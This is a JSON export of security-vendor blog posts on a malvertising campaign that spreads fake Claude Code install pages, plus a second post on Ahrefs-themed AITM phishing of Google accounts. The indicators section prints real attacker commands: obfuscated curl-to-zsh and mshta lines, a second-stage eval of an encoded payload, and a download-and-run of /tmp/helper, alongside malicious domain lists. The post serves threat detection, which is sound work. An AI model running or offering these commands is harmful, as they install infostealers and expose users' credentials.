claude[.]update-version[.]com.",[],{},{"nodeType":312,"data":13262,"content":13266},{"target":13263},{"sys":13264},{"id":13265,"type":317,"linkType":318},"TXcSp34sIAOKIXlKT4Lb0",[],{"nodeType":178,"data":13268,"content":13269},{},[13270],{"nodeType":173,"value":13271,"marks":13272,"data":13273},"Notably, we saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign. ",[],{},{"nodeType":312,"data":13275,"content":13279},{"target":13276},{"sys":13277},{"id":13278,"type":317,"linkType":318},"3ExLtcl6df07BcKPsGZn42",[],{"nodeType":235,"data":13281,"content":13282},{},[13283],{"nodeType":173,"value":13284,"marks":13285,"data":13286},"Abusing legitimate hosting services",[],{},{"nodeType":178,"data":13288,"content":13289},{},[13290,13294,13302],{"nodeType":173,"value":13291,"marks":13292,"data":13293},"Another common theme we see across pretty much every phishing site these days is the abuse of legitimate domains for hosting malicious content. This allows attackers to blend in with normal web traffic and is a core ",[],{},{"nodeType":186,"data":13295,"content":13296},{"uri":6820},[13297],{"nodeType":173,"value":13298,"marks":13299,"data":13301},"detection evasion technique",[13300],{"type":194},{},{"nodeType":173,"value":197,"marks":13303,"data":13304},[],{},{"nodeType":178,"data":13306,"content":13307},{},[13308],{"nodeType":173,"value":13309,"marks":13310,"data":13311},"In this case, we observed Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne being used. ",[],{},{"nodeType":231,"data":13313,"content":13314},{},[],{"nodeType":169,"data":13316,"content":13317},{},[13318],{"nodeType":173,"value":13319,"marks":13320,"data":13322},"A broader trend",[13321],{"type":370},{},{"nodeType":178,"data":13324,"content":13325},{},[13326],{"nodeType":173,"value":13327,"marks":13328,"data":13329},"This isn't happening in isolation. Claude and its associated tools have become a recurring target for recent malware distribution campaigns:",[],{},{"nodeType":250,"data":13331,"content":13332},{},[13333,13356,13379,13402],{"nodeType":254,"data":13334,"content":13335},{},[13336],{"nodeType":178,"data":13337,"content":13338},{},[13339,13342,13352],{"nodeType":173,"value":37,"marks":13340,"data":13341},[],{},{"nodeType":186,"data":13343,"content":13345},{"uri":13344},"https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/",[13346],{"nodeType":173,"value":13347,"marks":13348,"data":13351},"Fake Claude artifacts used in traditional ClickFix lures",[13349,13350],{"type":194},{"type":370},{},{"nodeType":173,"value":13353,"marks":13354,"data":13355},": Attackers created public pages on the claude.ai domain itself (user-generated content that inherited the domain's trust) containing malicious terminal commands disguised as macOS utilities. These were promoted via hijacked Google Ads and viewed over 15,000 times before being taken down.",[],{},{"nodeType":254,"data":13357,"content":13358},{},[13359],{"nodeType":178,"data":13360,"content":13361},{},[13362,13365,13375],{"nodeType":173,"value":37,"marks":13363,"data":13364},[],{},{"nodeType":186,"data":13366,"content":13368},{"uri":13367},"https://hunt.io/blog/fake-homebrew-clickfix-cuckoo-stealer-macos",[13369],{"nodeType":173,"value":13370,"marks":13371,"data":13374},"Fake Homebrew installation pages",[13372,13373],{"type":194},{"type":370},{},{"nodeType":173,"value":13376,"marks":13377,"data":13378},": Near-identical clones of the Homebrew website delivering the Cuckoo infostealer to macOS users, using the same \"copy this install command\" mechanic.",[],{},{"nodeType":254,"data":13380,"content":13381},{},[13382],{"nodeType":178,"data":13383,"content":13384},{},[13385,13388,13398],{"nodeType":173,"value":37,"marks":13386,"data":13387},[],{},{"nodeType":186,"data":13389,"content":13391},{"uri":13390},"https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer",[13392],{"nodeType":173,"value":13393,"marks":13394,"data":13397},"Fake OpenClaw installers on GitHub",[13395,13396],{"type":194},{"type":370},{},{"nodeType":173,"value":13399,"marks":13400,"data":13401},": Malicious repositories impersonating the popular AI agent tool, boosted by Bing's AI search results, delivering infostealers and the GhostSocks proxy malware.",[],{},{"nodeType":254,"data":13403,"content":13404},{},[13405],{"nodeType":178,"data":13406,"content":13407},{},[13408,13411,13421],{"nodeType":173,"value":37,"marks":13409,"data":13410},[],{},{"nodeType":186,"data":13412,"content":13414},{"uri":13413},"https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html",[13415],{"nodeType":173,"value":13416,"marks":13417,"data":13420},"Trojanised npm packages",[13418,13419],{"type":194},{"type":370},{},{"nodeType":173,"value":13422,"marks":13423,"data":13424},": Malicious packages mimicking Claude Code's official npm package name, targeting developers who might make a typo or trust an unofficial source.",[],{},{"nodeType":178,"data":13426,"content":13427},{},[13428],{"nodeType":173,"value":13429,"marks":13430,"data":13431},"But this isn’t just a Claude problem — any tool or site that is likely to get clicks, and can be easily cloned, is a potential target for malvertising and impersonation. For example, we’ve also recently seen attackers target free web tools with clever ClickFix lures that only load after an attacker has interacted with the page — in the example below, uploading a file to remove an image background, or convert a document to PDF. These are clones of real sites that attackers have cloned because they allow them to intercept users entering common search terms. ",[],{},{"nodeType":312,"data":13433,"content":13437},{"target":13434},{"sys":13435},{"id":13436,"type":317,"linkType":318},"6fbQRdi1xXzMOmYTcAGDLc",[],{"nodeType":231,"data":13439,"content":13440},{},[],{"nodeType":235,"data":13442,"content":13443},{},[13444],{"nodeType":173,"value":13445,"marks":13446,"data":13448},"How Push detects InstallFix",[13447],{"type":370},{},{"nodeType":178,"data":13450,"content":13451},{},[13452],{"nodeType":173,"value":13453,"marks":13454,"data":13455},"Regardless of the delivery channel, whether it's a phishing email, a malvertising lure, or a fake install page, all roads lead to a web page loaded in the user's browser, and that's where Push operates.",[],{},{"nodeType":178,"data":13457,"content":13458},{},[13459],{"nodeType":173,"value":13460,"marks":13461,"data":13462},"Push sees what the user sees: the page as it renders in the browser, in real time. This means we can detect InstallFix pages by identifying the combination of signals that characterise them: lookalike domains impersonating known developer tools, copy-to-clipboard elements containing shell commands, and the presence of malvertising delivery indicators.",[],{},{"nodeType":178,"data":13464,"content":13465},{},[13466],{"nodeType":173,"value":13467,"marks":13468,"data":13469},"Because Push detects threats directly in the browser, it doesn't matter that the attack came from a Google Search ad rather than an email. There's no phishing email for a Secure Email Gateway to inspect — the user searched for and navigated to the page themselves. But the page still loads in the browser, where Push is there to catch it.",[],{},{"nodeType":178,"data":13471,"content":13472},{},[13473,13477,13484,13487,13494,13497,13504],{"nodeType":173,"value":13474,"marks":13475,"data":13476},"To learn more about how Push protects against InstallFix, ClickFix, and other browser-based attacks, ",[],{},{"nodeType":186,"data":13478,"content":13479},{"uri":1456},[13480],{"nodeType":173,"value":1459,"marks":13481,"data":13483},[13482],{"type":194},{},{"nodeType":173,"value":2936,"marks":13485,"data":13486},[],{},{"nodeType":186,"data":13488,"content":13489},{"uri":3941},[13490],{"nodeType":173,"value":3944,"marks":13491,"data":13493},[13492],{"type":194},{},{"nodeType":173,"value":3949,"marks":13495,"data":13496},[],{},{"nodeType":186,"data":13498,"content":13499},{"uri":1469},[13500],{"nodeType":173,"value":1472,"marks":13501,"data":13503},[13502],{"type":194},{},{"nodeType":173,"value":1477,"marks":13505,"data":13506},[],{},{"nodeType":231,"data":13508,"content":13509},{},[],{"nodeType":169,"data":13511,"content":13512},{},[13513],{"nodeType":173,"value":8406,"marks":13514,"data":13516},[13515],{"type":370},{},{"nodeType":178,"data":13518,"content":13519},{},[13520,13524,13531],{"nodeType":173,"value":13521,"marks":13522,"data":13523},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":186,"data":13525,"content":13526},{"uri":8419},[13527],{"nodeType":173,"value":8422,"marks":13528,"data":13530},[13529],{"type":194},{},{"nodeType":173,"value":13532,"marks":13533,"data":13534}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":178,"data":13536,"content":13537},{},[13538],{"nodeType":173,"value":13539,"marks":13540,"data":13541},"This is a fast-moving situation, with domains constantly being spun up. At the time of writing, the domains observed were:",[],{},{"nodeType":178,"data":13543,"content":13544},{},[13545],{"nodeType":173,"value":13546,"marks":13547,"data":13549},"Cloned domains:",[13548],{"type":370},{},{"nodeType":250,"data":13551,"content":13552},{},[13553,13563,13573,13583,13593,13603,13612,13622,13632,13641,13651,13661,13671,13681,13691,13701,13711,13720,13730,13740,13750],{"nodeType":254,"data":13554,"content":13555},{},[13556],{"nodeType":178,"data":13557,"content":13558},{},[13559],{"nodeType":173,"value":13560,"marks":13561,"data":13562},"claud-code[.]pages[.]dev",[],{},{"nodeType":254,"data":13564,"content":13565},{},[13566],{"nodeType":178,"data":13567,"content":13568},{},[13569],{"nodeType":173,"value":13570,"marks":13571,"data":13572},"claulastver[.]squarespace[.]com",[],{},{"nodeType":254,"data":13574,"content":13575},{},[13576],{"nodeType":178,"data":13577,"content":13578},{},[13579],{"nodeType":173,"value":13580,"marks":13581,"data":13582},"claudecode-developers[.]squarespace[.]com",[],{},{"nodeType":254,"data":13584,"content":13585},{},[13586],{"nodeType":178,"data":13587,"content":13588},{},[13589],{"nodeType":173,"value":13590,"marks":13591,"data":13592},"hgjbulk.pages[.]dev",[],{},{"nodeType":254,"data":13594,"content":13595},{},[13596],{"nodeType":178,"data":13597,"content":13598},{},[13599],{"nodeType":173,"value":13600,"marks":13601,"data":13602},"jhgyuifyfiguohi[.]pages[.]dev",[],{},{"nodeType":254,"data":13604,"content":13605},{},[13606],{"nodeType":178,"data":13607,"content":13608},{},[13609],{"nodeType":173,"value":13590,"marks":13610,"data":13611},[],{},{"nodeType":254,"data":13613,"content":13614},{},[13615],{"nodeType":178,"data":13616,"content":13617},{},[13618],{"nodeType":173,"value":13619,"marks":13620,"data":13621},"claude-code-install[.]squarespace[.]com",[],{},{"nodeType":254,"data":13623,"content":13624},{},[13625],{"nodeType":178,"data":13626,"content":13627},{},[13628],{"nodeType":173,"value":13629,"marks":13630,"data":13631},"claude-code-docs-site[.]pages[.]dev",[],{},{"nodeType":254,"data":13633,"content":13634},{},[13635],{"nodeType":178,"data":13636,"content":13637},{},[13638],{"nodeType":173,"value":13570,"marks":13639,"data":13640},[],{},{"nodeType":254,"data":13642,"content":13643},{},[13644],{"nodeType":178,"data":13645,"content":13646},{},[13647],{"nodeType":173,"value":13648,"marks":13649,"data":13650},"cladueall[.]pages[.]dev",[],{},{"nodeType":254,"data":13652,"content":13653},{},[13654],{"nodeType":178,"data":13655,"content":13656},{},[13657],{"nodeType":173,"value":13658,"marks":13659,"data":13660},"claude-code-docs-dvlr2jpuuw[.]edgeone[.]app",[],{},{"nodeType":254,"data":13662,"content":13663},{},[13664],{"nodeType":178,"data":13665,"content":13666},{},[13667],{"nodeType":173,"value":13668,"marks":13669,"data":13670},"myclauda[.]it[.]com",[],{},{"nodeType":254,"data":13672,"content":13673},{},[13674],{"nodeType":178,"data":13675,"content":13676},{},[13677],{"nodeType":173,"value":13678,"marks":13679,"data":13680},"vdsafsaf[.]it[.]com",[],{},{"nodeType":254,"data":13682,"content":13683},{},[13684],{"nodeType":178,"data":13685,"content":13686},{},[13687],{"nodeType":173,"value":13688,"marks":13689,"data":13690},"asdasdasdadsvvvvv[.]pages[.]dev/",[],{},{"nodeType":254,"data":13692,"content":13693},{},[13694],{"nodeType":178,"data":13695,"content":13696},{},[13697],{"nodeType":173,"value":13698,"marks":13699,"data":13700},"nnnnnnnnnnnnnnnnnnnnn[.]pages[.]dev",[],{},{"nodeType":254,"data":13702,"content":13703},{},[13704],{"nodeType":178,"data":13705,"content":13706},{},[13707],{"nodeType":173,"value":13708,"marks":13709,"data":13710},"claude-code-macos[.]com",[],{},{"nodeType":254,"data":13712,"content":13713},{},[13714],{"nodeType":178,"data":13715,"content":13716},{},[13717],{"nodeType":173,"value":13629,"marks":13718,"data":13719},[],{},{"nodeType":254,"data":13721,"content":13722},{},[13723],{"nodeType":178,"data":13724,"content":13725},{},[13726],{"nodeType":173,"value":13727,"marks":13728,"data":13729},"claude-code-update[.]squarespace[.]com",[],{},{"nodeType":254,"data":13731,"content":13732},{},[13733],{"nodeType":178,"data":13734,"content":13735},{},[13736],{"nodeType":173,"value":13737,"marks":13738,"data":13739},"claudecodeupdate[.]squarespace[.]com",[],{},{"nodeType":254,"data":13741,"content":13742},{},[13743],{"nodeType":178,"data":13744,"content":13745},{},[13746],{"nodeType":173,"value":13747,"marks":13748,"data":13749},"notebooklm-version-upd[.]squarespace[.]com",[],{},{"nodeType":254,"data":13751,"content":13752},{},[13753],{"nodeType":178,"data":13754,"content":13755},{},[13756],{"nodeType":173,"value":13757,"marks":13758,"data":13759},"notklmalans[.]pages[.]dev",[],{},{"nodeType":178,"data":13761,"content":13762},{},[13763],{"nodeType":173,"value":13764,"marks":13765,"data":13767},"Domains hosting malicious payload:",[13766],{"type":370},{},{"nodeType":250,"data":13769,"content":13770},{},[13771,13781,13791],{"nodeType":254,"data":13772,"content":13773},{},[13774],{"nodeType":178,"data":13775,"content":13776},{},[13777],{"nodeType":173,"value":13778,"marks":13779,"data":13780},"contatoplus[.]com",[],{},{"nodeType":254,"data":13782,"content":13783},{},[13784],{"nodeType":178,"data":13785,"content":13786},{},[13787],{"nodeType":173,"value":13788,"marks":13789,"data":13790},"sarahmoftah[.]com",[],{},{"nodeType":254,"data":13792,"content":13793},{},[13794],{"nodeType":178,"data":13795,"content":13796},{},[13797],{"nodeType":173,"value":13798,"marks":13799,"data":13800},"claude[.]update-version[.]com",[],{},{"nodeType":178,"data":13802,"content":13803},{},[13804],{"nodeType":173,"value":13805,"marks":13806,"data":13808},"Commands:",[13807],{"type":370},{},{"nodeType":178,"data":13810,"content":13811},{},[13812],{"nodeType":173,"value":13813,"marks":13814,"data":13817},"curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zsh",[13815],{"type":13816},"code",{},{"nodeType":178,"data":13819,"content":13820},{},[13821],{"nodeType":173,"value":37,"marks":13822,"data":13823},[],{},{"nodeType":178,"data":13825,"content":13826},{},[13827],{"nodeType":173,"value":13828,"marks":13829,"data":13831},"curl -sfkSL $(echo 'aHR0cHM6Ly93cmljb25zdWx0LmNvbS9jdXJsLzhhZjY1YmEzODg1ZDZlMjU5NmVhMmNlMmRiNGEzYmM1ZWUwMmI4ZGViMzM2ZjlhZTkzZTI2MmM0ZGIwMGI3NTc='|base64 -D)| zsh",[13830],{"type":13816},{},{"nodeType":178,"data":13833,"content":13834},{},[13835],{"nodeType":173,"value":13836,"marks":13837,"data":13838},"\n",[],{},{"nodeType":178,"data":13840,"content":13841},{},[13842],{"nodeType":173,"value":13843,"marks":13844,"data":13846},"C:\\Windows\\SysWOW64\\mshta.exe https://claude.update-version.com/claude ",[13845],{"type":13816},{},{"nodeType":178,"data":13848,"content":13849},{},[13850,13853],{"nodeType":173,"value":13836,"marks":13851,"data":13852},[],{},{"nodeType":173,"value":13854,"marks":13855,"data":13857},"Base64 decoded url:",[13856],{"type":370},{},{"nodeType":178,"data":13859,"content":13860},{},[13861],{"nodeType":173,"value":13862,"marks":13863,"data":13865},"contatoplus[.]com/curl/8d2d275360adedecfbbd91567daddeed80d20aceb8aa4320d06a21486493945b ",[13864],{"type":13816},{},{"nodeType":178,"data":13867,"content":13868},{},[13869],{"nodeType":173,"value":37,"marks":13870,"data":13871},[],{},{"nodeType":178,"data":13873,"content":13874},{},[13875],{"nodeType":173,"value":13876,"marks":13877,"data":13879},"saramoftah[.]com/curl/958ca005af6a71be22cfcd5de82ebf5c8b809b7ee28999b6ed38bfe5d19420",[13878],{"type":13816},{},{"nodeType":178,"data":13881,"content":13882},{},[13883,13886],{"nodeType":173,"value":13836,"marks":13884,"data":13885},[],{},{"nodeType":173,"value":13887,"marks":13888,"data":13890},"Second stage:",[13889],{"type":370},{},{"nodeType":178,"data":13892,"content":13893},{},[13894],{"nodeType":173,"value":13895,"marks":13896,"data":13898},"#!/bin/zsh",[13897],{"type":13816},{},{"nodeType":178,"data":13900,"content":13901},{},[13902],{"nodeType":173,"value":13903,"marks":13904,"data":13906},"mkgrc9=$(base64 -D \u003C\u003C'PAYLOAD_END' | gunzip",[13905],{"type":13816},{},{"nodeType":178,"data":13908,"content":13909},{},[13910],{"nodeType":173,"value":13911,"marks":13912,"data":13914},"H4sIAKgRpGkC/13LPQqAMAxA4b2niAhdpGYVbxPbSoT+0UYonl5HdXwfvHHA7Uh4NVb2rAFMBpRYkH0ovgKLlLYiNqoU8y7Es80R05LwLI7Eg9bQSaSCsZ/zccsxO5j631+pbrYTnkSAAAAA",[13913],{"type":13816},{},{"nodeType":178,"data":13916,"content":13917},{},[13918],{"nodeType":173,"value":13919,"marks":13920,"data":13922},"PAYLOAD_END",[13921],{"type":13816},{},{"nodeType":178,"data":13924,"content":13925},{},[13926],{"nodeType":173,"value":1260,"marks":13927,"data":13929},[13928],{"type":13816},{},{"nodeType":178,"data":13931,"content":13932},{},[13933],{"nodeType":173,"value":13934,"marks":13935,"data":13937},"eval \"$mkgrc9\"",[13936],{"type":13816},{},{"nodeType":178,"data":13939,"content":13940},{},[13941,13944],{"nodeType":173,"value":13836,"marks":13942,"data":13943},[],{},{"nodeType":173,"value":13945,"marks":13946,"data":13948},"Binaries:",[13947],{"type":370},{},{"nodeType":178,"data":13950,"content":13951},{},[13952],{"nodeType":173,"value":13895,"marks":13953,"data":13955},[13954],{"type":13816},{},{"nodeType":178,"data":13957,"content":13958},{},[13959],{"nodeType":173,"value":13960,"marks":13961,"data":13963},"curl -o /tmp/helper https://saramoftah.com/n8n/update && xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",[13962],{"type":13816},{},"InstallFix: How attackers are weaponizing malvertised install guides  ","Attackers are impersonating popular developer tools like Claude Code to distribute fake install instructions via malicious search engine ads.","2026-03-06T00:00:00.000Z","installfix",{"items":13969},[13970,13972],{"sys":13971,"name":505},{"id":504},{"sys":13973,"name":509},{"id":508},{"items":13975},[13976],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":13980},"Jacques Louw","Jacques","Co-founder / CRO",{"url":13981},"https://images.ctfassets.net/y1cdw1ablpvd/39m8bektV23lnCRcEq0G8h/2a08f6276a50744f1a4b499b273f6bb2/Push_Founders_at_Cahoots_October_28_2022_by_Doug_Coombe-21.jpg",{"__typename":1528,"sys":13983,"content":13984,"title":6639,"synopsis":14583,"hashTags":118,"publishedDate":14584,"slug":6640,"tagsCollection":14585,"authorsCollection":14591},{"id":1702},{"json":13985},{"nodeType":165,"data":13986,"content":13987},{},[13988,13995,14002,14051,14057,14064,14071,14077,14083,14089,14092,14100,14107,14113,14120,14126,14132,14139,14145,14162,14165,14173,14180,14187,14194,14201,14207,14225,14228,14236,14243,14298,14305,14312,14315,14322,14329,14336,14343,14369,14372,14379,14395,14402,14445,14452,14495,14502,14575],{"nodeType":178,"data":13989,"content":13990},{},[13991],{"nodeType":173,"value":13992,"marks":13993,"data":13994},"In recent months, we’ve seen a significant increase in the number of attacks targeting ad manager accounts. These attacks ultimately serve up an Attacker-in-the-Middle (AITM) phishing page designed to steal the victim’s Google account. ",[],{},{"nodeType":178,"data":13996,"content":13997},{},[13998],{"nodeType":173,"value":13999,"marks":14000,"data":14001},"Most recently, we reported on:",[],{},{"nodeType":250,"data":14003,"content":14004},{},[14005,14028],{"nodeType":254,"data":14006,"content":14007},{},[14008],{"nodeType":178,"data":14009,"content":14010},{},[14011,14015,14024],{"nodeType":173,"value":14012,"marks":14013,"data":14014},"A campaign running ",[],{},{"nodeType":186,"data":14016,"content":14018},{"uri":14017},"https://pushsecurity.com/blog/analysing-a-malvertising-attack-targeting-business-google-accounts/",[14019],{"nodeType":173,"value":14020,"marks":14021,"data":14023},"fake malvertising ads for “Google Ads”",[14022],{"type":194},{},{"nodeType":173,"value":14025,"marks":14026,"data":14027}," in Google Search. ",[],{},{"nodeType":254,"data":14029,"content":14030},{},[14031],{"nodeType":178,"data":14032,"content":14033},{},[14034,14038,14047],{"nodeType":173,"value":14035,"marks":14036,"data":14037},"A campaign using sophisticated ",[],{},{"nodeType":186,"data":14039,"content":14041},{"uri":14040},"https://pushsecurity.com/blog/uncovering-a-calendly-themed-phishing-campaign/",[14042],{"nodeType":173,"value":14043,"marks":14044,"data":14046},"Calendly-themed phishing lures",[14045],{"type":194},{},{"nodeType":173,"value":14048,"marks":14049,"data":14050}," targeting marketing professionals.",[],{},{"nodeType":312,"data":14052,"content":14056},{"target":14053},{"sys":14054},{"id":14055,"type":317,"linkType":318},"1ThnhFZQIhzV179qclvzFH",[],{"nodeType":178,"data":14058,"content":14059},{},[14060],{"nodeType":173,"value":14061,"marks":14062,"data":14063},"Now, we’ve seen the Google Ads malvertising campaign expand to run additional ads impersonating Ahrefs, an AI marketing platform. Crucially, employees with access to Ahrefs are highly likely to also have access to Google Ads, meaning that attackers can reliably target Google accounts via Ahrefs. ",[],{},{"nodeType":178,"data":14065,"content":14066},{},[14067],{"nodeType":173,"value":14068,"marks":14069,"data":14070},"You can see a demo of the phishing chain below. ",[],{},{"nodeType":312,"data":14072,"content":14076},{"target":14073},{"sys":14074},{"id":14075,"type":317,"linkType":318},"2XjyySGldgl9uPA7CZRms8",[],{"nodeType":312,"data":14078,"content":14082},{"target":14079},{"sys":14080},{"id":14081,"type":317,"linkType":318},"yB12nGF91iq15GoHWItaX",[],{"nodeType":312,"data":14084,"content":14088},{"target":14085},{"sys":14086},{"id":14087,"type":317,"linkType":318},"2NK29DaTd93kOctyWxV0RT",[],{"nodeType":231,"data":14090,"content":14091},{},[],{"nodeType":169,"data":14093,"content":14094},{},[14095],{"nodeType":173,"value":14096,"marks":14097,"data":14099},"Attack breakdown",[14098],{"type":370},{},{"nodeType":178,"data":14101,"content":14102},{},[14103],{"nodeType":173,"value":14104,"marks":14105,"data":14106},"Users searching for “ahrefs” on Google Search were served with a fake ad impersonating Ahrefs, hosted on Squarespace, a legitimate website building and hosting platform. Previously, we’d seen this campaign use hosting sites Odoo and Kartra to similar effect. ",[],{},{"nodeType":312,"data":14108,"content":14112},{"target":14109},{"sys":14110},{"id":14111,"type":317,"linkType":318},"59dhFey5rahm5sA20NudTl",[],{"nodeType":178,"data":14114,"content":14115},{},[14116],{"nodeType":173,"value":14117,"marks":14118,"data":14119},"Upon clicking the link, the victim was taken to a clone of the real Ahrefs site. Crucially, you can see that the domain is not the official Ahrefs domain. ",[],{},{"nodeType":312,"data":14121,"content":14125},{"target":14122},{"sys":14123},{"id":14124,"type":317,"linkType":318},"48fQUiJXC1qACKUUPDliS5",[],{"nodeType":312,"data":14127,"content":14131},{"target":14128},{"sys":14129},{"id":14130,"type":317,"linkType":318},"77iqOW1jDVt5Oxw8qTwnKG",[],{"nodeType":178,"data":14133,"content":14134},{},[14135],{"nodeType":173,"value":14136,"marks":14137,"data":14138},"However, the site is not fully interactable beyond the front page. Clicking on any link takes the user to a Google sign-in page. ",[],{},{"nodeType":312,"data":14140,"content":14144},{"target":14141},{"sys":14142},{"id":14143,"type":317,"linkType":318},"7t9BoUyIFN8dlBDksjsYlD",[],{"nodeType":178,"data":14146,"content":14147},{},[14148,14152,14159],{"nodeType":173,"value":14149,"marks":14150,"data":14151},"This is in fact an AITM phishing page that is designed to hijack the victim’s Google account. Entering credentials and completing the MFA check will result in the attacker stealing the app session and effectively taking over the account. The phishing kit used matches ",[],{},{"nodeType":186,"data":14153,"content":14154},{"uri":14017},[14155],{"nodeType":173,"value":14156,"marks":14157,"data":14158},"the previous malvertising detected impersonating Google Ads",[],{},{"nodeType":173,"value":197,"marks":14160,"data":14161},[],{},{"nodeType":231,"data":14163,"content":14164},{},[],{"nodeType":169,"data":14166,"content":14167},{},[14168],{"nodeType":173,"value":14169,"marks":14170,"data":14172},"Why are attackers targeting ad manager accounts?",[14171],{"type":370},{},{"nodeType":178,"data":14174,"content":14175},{},[14176],{"nodeType":173,"value":14177,"marks":14178,"data":14179},"Ad Manager accounts on platforms like Google, Facebook, and LinkedIn have become lucrative targets for cybercriminals. By compromising these accounts, attackers can exploit the digital advertising ecosystem in various ways for financial gain. ",[],{},{"nodeType":178,"data":14181,"content":14182},{},[14183],{"nodeType":173,"value":14184,"marks":14185,"data":14186},"The ad industry’s scale makes it attractive to fraud. Estimates suggest digital ad fraud cost advertisers tens of billions, potentially nearing $100 billion or more, with projections reaching $172 billion by 2028.",[],{},{"nodeType":178,"data":14188,"content":14189},{},[14190],{"nodeType":173,"value":14191,"marks":14192,"data":14193},"A hijacked Google Ad Manager account gives attackers access to significant ad spend and account data which can be monetized illicitly. The tactics range from stealthy ad fraud to overt abuse like malicious ads or extortion schemes.",[],{},{"nodeType":178,"data":14195,"content":14196},{},[14197],{"nodeType":173,"value":14198,"marks":14199,"data":14200},"Pretty much every enterprise today advertises their services via Google ads — this makes attacks on these accounts pretty much a unanimous problem. Agencies managing numerous client accounts are put further at risk. For example, if an attacker can compromise an MCC account (used to manage several ad accounts) they get full access to the customer portfolio. ",[],{},{"nodeType":312,"data":14202,"content":14206},{"target":14203},{"sys":14204},{"id":14205,"type":317,"linkType":318},"1WPbstxHtdjnAKpF1rhCpW",[],{"nodeType":178,"data":14208,"content":14209},{},[14210,14214,14222],{"nodeType":173,"value":14211,"marks":14212,"data":14213},"Learn more about why attackers are targeting ad manager accounts ",[],{},{"nodeType":186,"data":14215,"content":14217},{"uri":14216},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis",[14218],{"nodeType":173,"value":14219,"marks":14220,"data":14221},"in our blog post",[],{},{"nodeType":173,"value":197,"marks":14223,"data":14224},[],{},{"nodeType":231,"data":14226,"content":14227},{},[],{"nodeType":169,"data":14229,"content":14230},{},[14231],{"nodeType":173,"value":14232,"marks":14233,"data":14235},"Why malvertising? ",[14234],{"type":370},{},{"nodeType":178,"data":14237,"content":14238},{},[14239],{"nodeType":173,"value":14240,"marks":14241,"data":14242},"Malvertising scams happen across lots of different sites, but the most common platform we see targeted is Google Search. This takes advantage of users browsing to find a website and clicking the first link that appears — in this case a fake sponsored link taking you to the attacker’s page. ",[],{},{"nodeType":178,"data":14244,"content":14245},{},[14246,14250,14257,14261,14270,14273,14282,14285,14294],{"nodeType":173,"value":14247,"marks":14248,"data":14249},"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. Malvertising is an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",[],{},{"nodeType":186,"data":14251,"content":14252},{"uri":1842},[14253],{"nodeType":173,"value":1845,"marks":14254,"data":14256},[14255],{"type":194},{},{"nodeType":173,"value":14258,"marks":14259,"data":14260}," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search). This isn’t just targeting ad manager accounts — last year, we reported on campaigns impersonating ",[],{},{"nodeType":186,"data":14262,"content":14264},{"uri":14263},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[14265],{"nodeType":173,"value":14266,"marks":14267,"data":14269},"TradingView",[14268],{"type":194},{},{"nodeType":173,"value":2936,"marks":14271,"data":14272},[],{},{"nodeType":186,"data":14274,"content":14276},{"uri":14275},"https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/",[14277],{"nodeType":173,"value":14278,"marks":14279,"data":14281},"Microsoft Office 365",[14280],{"type":194},{},{"nodeType":173,"value":9534,"marks":14283,"data":14284},[],{},{"nodeType":186,"data":14286,"content":14288},{"uri":14287},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/",[14289],{"nodeType":173,"value":14290,"marks":14291,"data":14293},"Onfido",[14292],{"type":194},{},{"nodeType":173,"value":14295,"marks":14296,"data":14297},", to name a few. ",[],{},{"nodeType":178,"data":14299,"content":14300},{},[14301],{"nodeType":173,"value":14302,"marks":14303,"data":14304},"There’s a tendency to see malvertising as a more random attack, but Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",[],{},{"nodeType":178,"data":14306,"content":14307},{},[14308],{"nodeType":173,"value":14309,"marks":14310,"data":14311},"Because these attacks completely circumvent the traditional phishing detection surface (email) and often happen entirely over the internet (meaning no endpoint security controls can come into play) the only way to reliably detect and stop these attacks is to intercept them where they happen — in the user’s web browser. ",[],{},{"nodeType":231,"data":14313,"content":14314},{},[],{"nodeType":169,"data":14316,"content":14317},{},[14318],{"nodeType":173,"value":8517,"marks":14319,"data":14321},[14320],{"type":370},{},{"nodeType":178,"data":14323,"content":14324},{},[14325],{"nodeType":173,"value":14326,"marks":14327,"data":14328},"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser, where Push is waiting to detect and block the attack. Even if the page has never been previously flagged as suspicious or malicious, Push analyses the page in real time and blocks it — protecting against the latest zero-day threats.  ",[],{},{"nodeType":178,"data":14330,"content":14331},{},[14332],{"nodeType":173,"value":14333,"marks":14334,"data":14335},"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and shuts it down.",[],{},{"nodeType":178,"data":14337,"content":14338},{},[14339],{"nodeType":173,"value":14340,"marks":14341,"data":14342},"Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack 